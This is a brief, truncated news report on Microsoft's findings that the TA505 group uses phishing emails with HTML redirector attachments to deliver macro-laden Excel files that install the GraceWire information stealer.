The cybercriminal group TA505 has reportedly changed up its tactics again, now engaging in phishing campaigns that leverage attachments with HTML redirectors in order to deliver Excel documents containing malware.
Following a short period of inactivity, the group, resumed activities last month with a scheme designed to get victims to install the information-stealing Trojan GraceWire, according to experts with the Microsoft Security Intelligence team. The threat actor is known for spreading Dridex, TrickBot and Locky malware, and is widely considered synonymous with the alleged Russian cybercriminal outfit Evil Corp.
Recipients of the phishing emails who opened the HTML redirector would end up downloading “Dudear” – an Excel file that drops the main payload (GraceWire) once the malicious macros was enabled. This is a new tactic for TA505, which previously would simply directly attach the malware to use a malicious URL, Microsoft explained in a series of tweets on Jan. 30. (Microsoft also refers to the entire TA505 operation as Dudear as well.)
“This is the first time that Dudear is observe ..
Support the originator by clicking the read the rest link below.
